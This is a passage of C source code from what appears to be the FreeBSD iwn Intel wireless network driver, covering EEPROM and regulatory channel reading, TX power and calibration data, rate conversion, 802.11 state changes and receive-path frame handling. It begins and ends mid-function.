"%s: could not lock ROM, error %d\n", __func__, error); return error; } if (sc->sc_flags & IWN_FLAG_HAS_OTPROM) { if ((error = iwn_init_otprom(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not initialize OTPROM, error %d\n", __func__, error); return error; } } iwn_read_prom_data(sc, IWN_EEPROM_SKU_CAP, &val, 2); DPRINTF(sc, IWN_DEBUG_RESET, "SKU capabilities=0x%04x\n", le16toh(val)); /* Check if HT support is bonded out. */ if (val & htole16(IWN_EEPROM_SKU_CAP_11N)) sc->sc_flags |= IWN_FLAG_HAS_11N; iwn_read_prom_data(sc, IWN_EEPROM_RFCFG, &val, 2); sc->rfcfg = le16toh(val); DPRINTF(sc, IWN_DEBUG_RESET, "radio config=0x%04x\n", sc->rfcfg); /* Read Tx/Rx chains from ROM unless it's known to be broken. */ if (sc->txchainmask == 0) sc->txchainmask = IWN_RFCFG_TXANTMSK(sc->rfcfg); if (sc->rxchainmask == 0) sc->rxchainmask = IWN_RFCFG_RXANTMSK(sc->rfcfg); /* Read MAC address. */ iwn_read_prom_data(sc, IWN_EEPROM_MAC, macaddr, 6); /* Read adapter-specific information from EEPROM. */ ops->read_eeprom(sc); iwn_apm_stop(sc); /* Power OFF adapter. */ iwn_eeprom_unlock(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); return 0; } static void iwn4965_read_eeprom(struct iwn_softc *sc) { uint32_t addr; uint16_t val; int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Read regulatory domain (4 ASCII characters). */ iwn_read_prom_data(sc, IWN4965_EEPROM_DOMAIN, sc->eeprom_domain, 4); /* Read the list of authorized channels (20MHz ones only). */ for (i = 0; i < IWN_NBANDS - 1; i++) { addr = iwn4965_regulatory_bands[i]; iwn_read_eeprom_channels(sc, i, addr); } /* Read maximum allowed TX power for 2GHz and 5GHz bands. */ iwn_read_prom_data(sc, IWN4965_EEPROM_MAXPOW, &val, 2); sc->maxpwr2GHz = val & 0xff; sc->maxpwr5GHz = val >> 8; /* Check that EEPROM values are within valid range. */ if (sc->maxpwr5GHz < 20 || sc->maxpwr5GHz > 50) sc->maxpwr5GHz = 38; if (sc->maxpwr2GHz < 20 || sc->maxpwr2GHz > 50) sc->maxpwr2GHz = 38; DPRINTF(sc, IWN_DEBUG_RESET, "maxpwr 2GHz=%d 5GHz=%d\n", sc->maxpwr2GHz, sc->maxpwr5GHz); /* Read samples for each TX power group. */ iwn_read_prom_data(sc, IWN4965_EEPROM_BANDS, sc->bands, sizeof sc->bands); /* Read voltage at which samples were taken. */ iwn_read_prom_data(sc, IWN4965_EEPROM_VOLTAGE, &val, 2); sc->eeprom_voltage = (int16_t)le16toh(val); DPRINTF(sc, IWN_DEBUG_RESET, "voltage=%d (in 0.3V)\n", sc->eeprom_voltage); #ifdef IWN_DEBUG /* Print samples. */ if (sc->sc_debug & IWN_DEBUG_ANY) { for (i = 0; i < IWN_NBANDS - 1; i++) iwn4965_print_power_group(sc, i); } #endif DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } #ifdef IWN_DEBUG static void iwn4965_print_power_group(struct iwn_softc *sc, int i) { struct iwn4965_eeprom_band *band = &sc->bands[i]; struct iwn4965_eeprom_chan_samples *chans = band->chans; int j, c; printf("===band %d===\n", i); printf("chan lo=%d, chan hi=%d\n", band->lo, band->hi); printf("chan1 num=%d\n", chans[0].num); for (c = 0; c < 2; c++) { for (j = 0; j < IWN_NSAMPLES; j++) { printf("chain %d, sample %d: temp=%d gain=%d " "power=%d pa_det=%d\n", c, j, chans[0].samples[c][j].temp, chans[0].samples[c][j].gain, chans[0].samples[c][j].power, chans[0].samples[c][j].pa_det); } } printf("chan2 num=%d\n", chans[1].num); for (c = 0; c < 2; c++) { for (j = 0; j < IWN_NSAMPLES; j++) { printf("chain %d, sample %d: temp=%d gain=%d " "power=%d pa_det=%d\n", c, j, chans[1].samples[c][j].temp, chans[1].samples[c][j].gain, chans[1].samples[c][j].power, chans[1].samples[c][j].pa_det); } } } #endif static void iwn5000_read_eeprom(struct iwn_softc *sc) { struct iwn5000_eeprom_calib_hdr hdr; int32_t volt; uint32_t base, addr; uint16_t val; int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Read regulatory domain (4 ASCII characters). */ iwn_read_prom_data(sc, IWN5000_EEPROM_REG, &val, 2); base = le16toh(val); iwn_read_prom_data(sc, base + IWN5000_EEPROM_DOMAIN, sc->eeprom_domain, 4); /* Read the list of authorized channels (20MHz ones only). */ for (i = 0; i < IWN_NBANDS - 1; i++) { addr = base + sc->base_params->regulatory_bands[i]; iwn_read_eeprom_channels(sc, i, addr); } /* Read enhanced TX power information for 6000 Series. */ if (sc->base_params->enhanced_TX_power) iwn_read_eeprom_enhinfo(sc); iwn_read_prom_data(sc, IWN5000_EEPROM_CAL, &val, 2); base = le16toh(val); iwn_read_prom_data(sc, base, &hdr, sizeof hdr); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: calib version=%u pa type=%u voltage=%u\n", __func__, hdr.version, hdr.pa_type, le16toh(hdr.volt)); sc->calib_ver = hdr.version; if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2) { sc->eeprom_voltage = le16toh(hdr.volt); iwn_read_prom_data(sc, base + IWN5000_EEPROM_TEMP, &val, 2); sc->eeprom_temp_high=le16toh(val); iwn_read_prom_data(sc, base + IWN5000_EEPROM_VOLT, &val, 2); sc->eeprom_temp = le16toh(val); } if (sc->hw_type == IWN_HW_REV_TYPE_5150) { /* Compute temperature offset. */ iwn_read_prom_data(sc, base + IWN5000_EEPROM_TEMP, &val, 2); sc->eeprom_temp = le16toh(val); iwn_read_prom_data(sc, base + IWN5000_EEPROM_VOLT, &val, 2); volt = le16toh(val); sc->temp_off = sc->eeprom_temp - (volt / -5); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "temp=%d volt=%d offset=%dK\n", sc->eeprom_temp, volt, sc->temp_off); } else { /* Read crystal calibration. */ iwn_read_prom_data(sc, base + IWN5000_EEPROM_CRYSTAL, &sc->eeprom_crystal, sizeof (uint32_t)); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "crystal calibration 0x%08x\n", le32toh(sc->eeprom_crystal)); } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } /* * Translate EEPROM flags to net80211. */ static uint32_t iwn_eeprom_channel_flags(struct iwn_eeprom_chan *channel) { uint32_t nflags; nflags = 0; if ((channel->flags & IWN_EEPROM_CHAN_ACTIVE) == 0) nflags |= IEEE80211_CHAN_PASSIVE; if ((channel->flags & IWN_EEPROM_CHAN_IBSS) == 0) nflags |= IEEE80211_CHAN_NOADHOC; if (channel->flags & IWN_EEPROM_CHAN_RADAR) { nflags |= IEEE80211_CHAN_DFS; /* XXX apparently IBSS may still be marked */ nflags |= IEEE80211_CHAN_NOADHOC; } return nflags; } static void iwn_read_eeprom_band(struct iwn_softc *sc, int n) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_eeprom_chan *channels = sc->eeprom_channels[n]; const struct iwn_chan_band *band = &iwn_bands[n]; struct ieee80211_channel *c; uint8_t chan; int i, nflags; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); for (i = 0; i < band->nchan; i++) { if (!(channels[i].flags & IWN_EEPROM_CHAN_VALID)) { DPRINTF(sc, IWN_DEBUG_RESET, "skip chan %d flags 0x%x maxpwr %d\n", band->chan[i], channels[i].flags, channels[i].maxpwr); continue; } chan = band->chan[i]; nflags = iwn_eeprom_channel_flags(&channels[i]); c = &ic->ic_channels[ic->ic_nchans++]; c->ic_ieee = chan; c->ic_maxregpower = channels[i].maxpwr; c->ic_maxpower = 2*c->ic_maxregpower; if (n == 0) { /* 2GHz band */ c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_G); /* G =>'s B is supported */ c->ic_flags = IEEE80211_CHAN_B | nflags; c = &ic->ic_channels[ic->ic_nchans++]; c[0] = c[-1]; c->ic_flags = IEEE80211_CHAN_G | nflags; } else { /* 5GHz band */ c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_A); c->ic_flags = IEEE80211_CHAN_A | nflags; } /* Save maximum allowed TX power for this channel. */ sc->maxpwr[chan] = channels[i].maxpwr; DPRINTF(sc, IWN_DEBUG_RESET, "add chan %d flags 0x%x maxpwr %d\n", chan, channels[i].flags, channels[i].maxpwr); if (sc->sc_flags & IWN_FLAG_HAS_11N) { /* add HT20, HT40 added separately */ c = &ic->ic_channels[ic->ic_nchans++]; c[0] = c[-1]; c->ic_flags |= IEEE80211_CHAN_HT20; } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static void iwn_read_eeprom_ht40(struct iwn_softc *sc, int n) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_eeprom_chan *channels = sc->eeprom_channels[n]; const struct iwn_chan_band *band = &iwn_bands[n]; struct ieee80211_channel *c, *cent, *extc; uint8_t chan; int i, nflags; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s start\n", __func__); if (!(sc->sc_flags & IWN_FLAG_HAS_11N)) { DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end no 11n\n", __func__); return; } for (i = 0; i < band->nchan; i++) { if (!(channels[i].flags & IWN_EEPROM_CHAN_VALID)) { DPRINTF(sc, IWN_DEBUG_RESET, "skip chan %d flags 0x%x maxpwr %d\n", band->chan[i], channels[i].flags, channels[i].maxpwr); continue; } chan = band->chan[i]; nflags = iwn_eeprom_channel_flags(&channels[i]); /* * Each entry defines an HT40 channel pair; find the * center channel, then the extension channel above. */ cent = ieee80211_find_channel_byieee(ic, chan, (n == 5 ? IEEE80211_CHAN_G : IEEE80211_CHAN_A)); if (cent == NULL) { /* XXX shouldn't happen */ device_printf(sc->sc_dev, "%s: no entry for channel %d\n", __func__, chan); continue; } extc = ieee80211_find_channel(ic, cent->ic_freq+20, (n == 5 ? IEEE80211_CHAN_G : IEEE80211_CHAN_A)); if (extc == NULL) { DPRINTF(sc, IWN_DEBUG_RESET, "%s: skip chan %d, extension channel not found\n", __func__, chan); continue; } DPRINTF(sc, IWN_DEBUG_RESET, "add ht40 chan %d flags 0x%x maxpwr %d\n", chan, channels[i].flags, channels[i].maxpwr); c = &ic->ic_channels[ic->ic_nchans++]; c[0] = cent[0]; c->ic_extieee = extc->ic_ieee; c->ic_flags &= ~IEEE80211_CHAN_HT; c->ic_flags |= IEEE80211_CHAN_HT40U | nflags; c = &ic->ic_channels[ic->ic_nchans++]; c[0] = extc[0]; c->ic_extieee = cent->ic_ieee; c->ic_flags &= ~IEEE80211_CHAN_HT; c->ic_flags |= IEEE80211_CHAN_HT40D | nflags; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static void iwn_read_eeprom_channels(struct iwn_softc *sc, int n, uint32_t addr) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; iwn_read_prom_data(sc, addr, &sc->eeprom_channels[n], iwn_bands[n].nchan * sizeof (struct iwn_eeprom_chan)); if (n < 5) iwn_read_eeprom_band(sc, n); else iwn_read_eeprom_ht40(sc, n); ieee80211_sort_channels(ic->ic_channels, ic->ic_nchans); } static struct iwn_eeprom_chan * iwn_find_eeprom_channel(struct iwn_softc *sc, struct ieee80211_channel *c) { int band, chan, i, j; if (IEEE80211_IS_CHAN_HT40(c)) { band = IEEE80211_IS_CHAN_5GHZ(c) ? 6 : 5; if (IEEE80211_IS_CHAN_HT40D(c)) chan = c->ic_extieee; else chan = c->ic_ieee; for (i = 0; i < iwn_bands[band].nchan; i++) { if (iwn_bands[band].chan[i] == chan) return &sc->eeprom_channels[band][i]; } } else { for (j = 0; j < 5; j++) { for (i = 0; i < iwn_bands[j].nchan; i++) { if (iwn_bands[j].chan[i] == c->ic_ieee) return &sc->eeprom_channels[j][i]; } } } return NULL; } /* * Enforce flags read from EEPROM. */ static int iwn_setregdomain(struct ieee80211com *ic, struct ieee80211_regdomain *rd, int nchan, struct ieee80211_channel chans[]) { struct iwn_softc *sc = ic->ic_ifp->if_softc; int i; for (i = 0; i < nchan; i++) { struct ieee80211_channel *c = &chans[i]; struct iwn_eeprom_chan *channel; channel = iwn_find_eeprom_channel(sc, c); if (channel == NULL) { if_printf(ic->ic_ifp, "%s: invalid channel %u freq %u/0x%x\n", __func__, c->ic_ieee, c->ic_freq, c->ic_flags); return EINVAL; } c->ic_flags |= iwn_eeprom_channel_flags(channel); } return 0; } static void iwn_read_eeprom_enhinfo(struct iwn_softc *sc) { struct iwn_eeprom_enhinfo enhinfo[35]; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_channel *c; uint16_t val, base; int8_t maxpwr; uint8_t flags; int i, j; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); iwn_read_prom_data(sc, IWN5000_EEPROM_REG, &val, 2); base = le16toh(val); iwn_read_prom_data(sc, base + IWN6000_EEPROM_ENHINFO, enhinfo, sizeof enhinfo); for (i = 0; i < nitems(enhinfo); i++) { flags = enhinfo[i].flags; if (!(flags & IWN_ENHINFO_VALID)) continue; /* Skip invalid entries. */ maxpwr = 0; if (sc->txchainmask & IWN_ANT_A) maxpwr = MAX(maxpwr, enhinfo[i].chain[0]); if (sc->txchainmask & IWN_ANT_B) maxpwr = MAX(maxpwr, enhinfo[i].chain[1]); if (sc->txchainmask & IWN_ANT_C) maxpwr = MAX(maxpwr, enhinfo[i].chain[2]); if (sc->ntxchains == 2) maxpwr = MAX(maxpwr, enhinfo[i].mimo2); else if (sc->ntxchains == 3) maxpwr = MAX(maxpwr, enhinfo[i].mimo3); for (j = 0; j < ic->ic_nchans; j++) { c = &ic->ic_channels[j]; if ((flags & IWN_ENHINFO_5GHZ)) { if (!IEEE80211_IS_CHAN_A(c)) continue; } else if ((flags & IWN_ENHINFO_OFDM)) { if (!IEEE80211_IS_CHAN_G(c)) continue; } else if (!IEEE80211_IS_CHAN_B(c)) continue; if ((flags & IWN_ENHINFO_HT40)) { if (!IEEE80211_IS_CHAN_HT40(c)) continue; } else { if (IEEE80211_IS_CHAN_HT40(c)) continue; } if (enhinfo[i].chan != 0 && enhinfo[i].chan != c->ic_ieee) continue; DPRINTF(sc, IWN_DEBUG_RESET, "channel %d(%x), maxpwr %d\n", c->ic_ieee, c->ic_flags, maxpwr / 2); c->ic_maxregpower = maxpwr / 2; c->ic_maxpower = maxpwr; } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static struct ieee80211_node * iwn_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { return malloc(sizeof (struct iwn_node), M_80211_NODE,M_NOWAIT | M_ZERO); } static __inline int rate2plcp(int rate) { switch (rate & 0xff) { case 12: return 0xd; case 18: return 0xf; case 24: return 0x5; case 36: return 0x7; case 48: return 0x9; case 72: return 0xb; case 96: return 0x1; case 108: return 0x3; case 2: return 10; case 4: return 20; case 11: return 55; case 22: return 110; } return 0; } /* * Calculate the required PLCP value from the given rate, * to the given node. * * This will take the node configuration (eg 11n, rate table * setup, etc) into consideration. */ static uint32_t iwn_rate_to_plcp(struct iwn_softc *sc, struct ieee80211_node *ni, uint8_t rate) { #define RV(v) ((v) & IEEE80211_RATE_VAL) struct ieee80211com *ic = ni->ni_ic; uint8_t txant1, txant2; uint32_t plcp = 0; int ridx; /* Use the first valid TX antenna. */ txant1 = IWN_LSB(sc->txchainmask); txant2 = IWN_LSB(sc->txchainmask & ~txant1); /* * If it's an MCS rate, let's set the plcp correctly * and set the relevant flags based on the node config. */ if (rate & IEEE80211_RATE_MCS) { /* * Set the initial PLCP value to be between 0->31 for * MCS 0 -> MCS 31, then set the "I'm an MCS rate!" * flag. */ plcp = RV(rate) | IWN_RFLAG_MCS; /* * XXX the following should only occur if both * the local configuration _and_ the remote node * advertise these capabilities. Thus this code * may need fixing! */ /* * Set the channel width and guard interval. */ if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) { plcp |= IWN_RFLAG_HT40; if (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI40) plcp |= IWN_RFLAG_SGI; } else if (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI20) { plcp |= IWN_RFLAG_SGI; } /* * If it's a two stream rate, enable TX on both * antennas. * * XXX three stream rates? */ if (rate > 0x87) plcp |= IWN_RFLAG_ANT(txant1 | txant2); else plcp |= IWN_RFLAG_ANT(txant1); } else { /* * Set the initial PLCP - fine for both * OFDM and CCK rates. */ plcp = rate2plcp(rate); /* Set CCK flag if it's CCK */ /* XXX It would be nice to have a method * to map the ridx -> phy table entry * so we could just query that, rather than * this hack to check against IWN_RIDX_OFDM6. */ ridx = ieee80211_legacy_rate_lookup(ic->ic_rt, rate & IEEE80211_RATE_VAL); if (ridx < IWN_RIDX_OFDM6 && IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) plcp |= IWN_RFLAG_CCK; /* Set antenna configuration */ plcp |= IWN_RFLAG_ANT(txant1); } DPRINTF(sc, IWN_DEBUG_TXRATE, "%s: rate=0x%02x, plcp=0x%08x\n", __func__, rate, plcp); return (htole32(plcp)); #undef RV } static void iwn_newassoc(struct ieee80211_node *ni, int isnew) { /* Doesn't do anything at the moment */ } static int iwn_media_change(struct ifnet *ifp) { int error; error = ieee80211_media_change(ifp); /* NB: only the fixed rate can change and that doesn't need a reset */ return (error == ENETRESET ? 0 : error); } static int iwn_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct iwn_vap *ivp = IWN_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct iwn_softc *sc = ic->ic_ifp->if_softc; int error = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); DPRINTF(sc, IWN_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); IWN_LOCK(sc); callout_stop(&sc->calib_to); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; switch (nstate) { case IEEE80211_S_ASSOC: if (vap->iv_state != IEEE80211_S_RUN) break; /* FALLTHROUGH */ case IEEE80211_S_AUTH: if (vap->iv_state == IEEE80211_S_AUTH) break; /* * !AUTH -> AUTH transition requires state reset to handle * reassociations correctly. */ sc->rxon->associd = 0; sc->rxon->filter &= ~htole32(IWN_FILTER_BSS); sc->calib.state = IWN_CALIB_STATE_INIT; if ((error = iwn_auth(sc, vap)) != 0) { device_printf(sc->sc_dev, "%s: could not move to auth state\n", __func__); } break; case IEEE80211_S_RUN: /* * RUN -> RUN transition; Just restart the timers. */ if (vap->iv_state == IEEE80211_S_RUN) { sc->calib_cnt = 0; break; } /* * !RUN -> RUN requires setting the association id * which is done with a firmware cmd. We also defer * starting the timers until that work is done. */ if ((error = iwn_run(sc, vap)) != 0) { device_printf(sc->sc_dev, "%s: could not move to run state\n", __func__); } break; case IEEE80211_S_INIT: sc->calib.state = IWN_CALIB_STATE_INIT; break; default: break; } IWN_UNLOCK(sc); IEEE80211_LOCK(ic); if (error != 0){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end in error\n", __func__); return error; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return ivp->iv_newstate(vap, nstate, arg); } static void iwn_calib_timeout(void *arg) { struct iwn_softc *sc = arg; IWN_LOCK_ASSERT(sc); /* Force automatic TX power calibration every 60 secs. */ if (++sc->calib_cnt >= 120) { uint32_t flags = 0; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s\n", "sending request for statistics"); (void)iwn_cmd(sc, IWN_CMD_GET_STATISTICS, &flags, sizeof flags, 1); sc->calib_cnt = 0; } callout_reset(&sc->calib_to, msecs_to_ticks(500), iwn_calib_timeout, sc); } /* * Process an RX_PHY firmware notification. This is usually immediately * followed by an MPDU_RX_DONE notification. */ static void iwn_rx_phy(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_rx_stat *stat = (struct iwn_rx_stat *)(desc + 1); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: received PHY stats\n", __func__); bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); /* Save RX statistics, they will be used on MPDU_RX_DONE. */ memcpy(&sc->last_rx_stat, stat, sizeof (*stat)); sc->last_rx_valid = 1; } /* * Process an RX_DONE (4965AGN only) or MPDU_RX_DONE firmware notification. * Each MPDU_RX_DONE notification must be preceded by an RX_PHY one. */ static void iwn_rx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_rx_ring *ring = &sc->rxq; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m, *m1; struct iwn_rx_stat *stat; caddr_t head; bus_addr_t paddr; uint32_t flags; int error, len, rssi, nf; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (desc->type == IWN_MPDU_RX_DONE) { /* Check for prior RX_PHY notification. */ if (!sc->last_rx_valid) { DPRINTF(sc, IWN_DEBUG_ANY, "%s: missing RX_PHY\n", __func__); return; } stat = &sc->last_rx_stat; } else stat = (struct iwn_rx_stat *)(desc + 1); bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); if (stat->cfg_phy_len > IWN_STAT_MAXLEN) { device_printf(sc->sc_dev, "%s: invalid RX statistic header, len %d\n", __func__, stat->cfg_phy_len); return; } if (desc->type == IWN_MPDU_RX_DONE) { struct iwn_rx_mpdu *mpdu = (struct iwn_rx_mpdu *)(desc + 1); head = (caddr_t)(mpdu + 1); len = le16toh(mpdu->len); } else { head = (caddr_t)(stat + 1) + stat->cfg_phy_len; len = le16toh(stat->len); } flags = le32toh(*(uint32_t *)(head + len)); /* Discard frames with a bad FCS early. */ if ((flags & IWN_RX_NOERROR) != IWN_RX_NOERROR) { DPRINTF(sc, IWN_DEBUG_RECV, "%s: RX flags error %x\n", __func__, flags); ifp->if_ierrors++; return; } /* Discard frames that are too short. */ if (len < sizeof (*wh)) { DPRINTF(sc, IWN_DEBUG_RECV, "%s: frame too short: %d\n", __func__, len); ifp->if_ierrors++; return; } m1 = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, IWN_RBUF_SIZE); if (m1 == NULL) { DPRINTF(sc, IWN_DEBUG_ANY, "%s: no mbuf to restock ring\n", __func__); ifp->if_ierrors++; return; } bus_dmamap_unload(ring->data_dmat, data->map); error = bus_dmamap_load(ring->data_dmat, data->map, mtod(m1, void *), IWN_RBUF_SIZE, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(m1); /* Try to reload the old mbuf. */ error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), IWN_RBUF_SIZE, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { panic("%s: could not load old RX mbuf", __func__); } /* Physical address may have changed. */ ring->desc[ring->cur] = htole32(paddr >> 8); bus_dmamap_sync(ring->data_dmat, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); ifp->if_ierrors++; return; } m = data->m; data->m = m1; /* Update RX descriptor. */ ring->desc[ring->cur] = htole32(paddr >> 8); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Finalize mbuf. */ m->m_pkthdr.rcvif = ifp; m->m_data = head; m->m_pkthdr.len = m->m_len = len; /* Grab a reference to the source node. */ wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = (ni != NULL && ni->ni_vap->iv_state == IEEE80211_S_RUN && (ic->ic_flags & IEEE80211_F_SCAN) == 0) ? sc->noise : -95; rssi = ops->get_rssi(sc, stat); if (ieee80211_radiotap_active(ic)) { struct iwn_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; if (stat->flags & htole16(IWN_STAT_FLAG_SHPREAMBLE)) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; tap->wr_dbm_antsignal = (int8_t)rssi; tap->wr_dbm_antnoise = (int8_t)nf; tap->wr_tsft = stat->tstamp; switch (stat->rate) { /* CCK rates. */ case 10: tap->wr_rate = 2; break; case 20: tap->wr_rate = 4; break; case 55: tap->wr_rate = 11; break; case 110: tap->wr_rate = 22; break; /* OFDM rates. */ case 0xd: tap->wr_rate = 12; break; case 0xf: tap->wr_rate = 18; break; case 0x5: tap->wr_rate = 24; break; case 0x7: tap->wr_rate = 36; break; case 0x9: tap->wr_rate = 48; break; case 0xb: tap->wr_rate = 72; break; case 0x1: tap->wr_rate = 96; break; case 0x3: tap->wr_rate = 108; break; /* Unknown rate: should not happen. */ default: tap->wr_rate = 0; } } IWN_UNLOCK(sc); /* Send the frame to the 802.11 layer. */ if (ni != NULL) { if (ni->ni_flags & IEEE80211_NODE_HT) m->m_flags |= M_AMPDU; (void)ieee80211_input(ni, m, rssi - nf, nf); /* Node is no longer needed. */ ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi - nf, nf); IWN_LOCK(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* Process an incoming Compressed BlockAck. */ static void iwn_rx_compressed_ba(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct iwn_node *wn; struct ieee80211_node *ni; struct iwn_compressed_ba *ba = (struct iwn_compressed_ba *)(desc + 1); struct iwn_tx_ring *txq; struct iwn_tx_data *txdata; struct ieee80211_tx_ampdu *tap; struct mbuf *m; uint64_t bitmap; uint16_t ssn; uint8_t tid; int ackfailcnt = 0, i, lastidx, qid, *res, shift; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); qid = le16toh(ba->qid); txq = &sc->txq[ba->qid]; tap = sc->qid2tap[ba->qid]; tid = tap->txa_tid; wn = (void *)tap->txa_ni; res = NULL; ssn = 0; if (!IEEE80211_AMPDU_RUNNING(tap)) { res = tap->txa_private; ssn = tap->txa_start & 0xfff; } for (lastidx = le16toh(ba->ssn) & 0xff; txq->read != lastidx;) { txdata = &txq->data[txq->read]; /* Unmap and free mbuf. */ bus_dmamap_sync(txq->data_dmat, txdata->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(txq->data_dmat, txdata->map); m = txdata->m, txdata->m = NULL; ni = txdata->ni, txdata->ni = NULL; KASSERT(ni != NULL, ("no node")); KASSERT(m != NULL, ("no mbuf")); ieee80211_tx_complete(ni, m, 1); txq->queued--; txq->read = (txq->read + 1) % IWN_TX_RING_COUNT; } if (txq->queued == 0 && res != NULL) { iwn_nic_lock(sc); ops->ampdu_tx_stop(sc, qid, tid, ssn); iwn_nic_unlock(sc); sc->qid2tap[qid] = NULL; free(res, M_DEVBUF); return; } if (wn->agg[tid].bitmap == 0) return; shift = wn->agg[tid].startidx - ((le16toh(ba->seq) >> 4) & 0xff); if (shift < 0) shift += 0x100; if (wn->agg[tid].nframes > (64 - shift)) return; ni = tap->txa_ni; bitmap = (le64toh(ba->bitmap) >> shift) & wn->agg[tid].bitmap; for (i = 0; bitmap; i++) { if ((bitmap & 1) == 0) { ifp->if_oerrors++; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_FAILURE, &ackfailcnt, NULL); } else { ifp->if_opackets++; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &ackfailcnt, NULL); } bitmap >>= 1; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Process a CALIBRATION_RESULT notification sent by the initialization * firmware on response to a CMD_CALIB_CONFIG command (5000 only). */ static void iwn5000_rx_calib_results(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_phy_calib *calib = (struct iwn_phy_calib *)(desc + 1); int len, idx = -1; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Runtime firmware should not send such a notification. */ if (sc->sc_flags & IWN_FLAG_CALIB_DONE){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s received after clib done\n", __func__); return; } len = (le32toh(desc->len) & 0x3fff) - 4; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); switch (calib->code) { case IWN5000_PHY_CALIB_DC: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_DC) idx = 0; break; case IWN5000_PHY_CALIB_LO: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_LO) idx = 1; break; case IWN5000_PHY_CALIB_TX_IQ: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TX_IQ) idx = 2; break; case IWN5000_PHY_CALIB_TX_IQ_PERIODIC: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TX_IQ_PERIODIC) idx = 3; break; case IWN5000_PHY_CALIB_BASE_BAND: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_BASE_BAND) idx = 4; break; } if (idx == -1) /* Ignore other results. */ 